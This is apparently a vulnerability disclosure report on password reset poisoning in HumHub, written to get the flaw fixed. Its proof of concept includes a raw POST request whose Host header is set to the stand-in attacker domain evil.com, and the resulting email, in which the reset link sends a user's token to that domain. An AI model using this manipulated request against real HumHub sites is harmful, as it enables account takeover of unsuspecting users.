Password Reset Poisoning in humhub/humhub
Sep 6th 2022
Humhub uses the HTTP Host-Header in a password reset request to generate the password reset link that is sent to the user in an email without any filters or checks. This allows an attacker to craft a password reset request using a manipulated host header, resulting in reset-token leakage and thus account takeover if the victim clicks the manipulated password reset link.
Proof of Concept
The Proof-of-Concept requires that the webserver ignores the host header. For instance, this is the case with the default Apache configuration without multiple vhosts.
Steps to reproduce on a local Humhub installation:
1. On the login page, click on `Forgot your password?` 2. Enter the victim's email address and the captcha. Intercept the request in Burp 3. Change the Host Header to `evil.com` and forward the request (Screenshot 1) 4. Observe that the password reset link points to the manipulated domain `evil.com` (Screenshot 2)
Manipulated password reset request:
POST /index.php?r=user%2Fpassword-recovery HTTP/1.1 Host: evil.com _csrf=[...]&AccountRecoverPassword%5Bemail%5D=admin%40test.com&AccountRecoverPassword%5BverifyCode%5D=beoadeq
Manipulated Password-Reset Link
Password-reset email sent by Humhub:
Password recovery Hello asd def Please use the following link wit= hin the next day to reset your password. If you don't use this link withi= n 24 hours, it will expire. Reset Password: http://evil.com/index.php?= r=3Duser/password-recovery/reset&token=3Dc536e810-da84-4f8b-9c8c-375e4b0235= da&guid=3D6a7ad7ef-a91a-4a2c-a13c-52e9decda42a
The victim receives the manipulated password-reset link in an email. If the victim clicks the link, the password reset token is leaked to the attacker. The attacker is thus able to change the password of the victim's account leading to complete account takeover.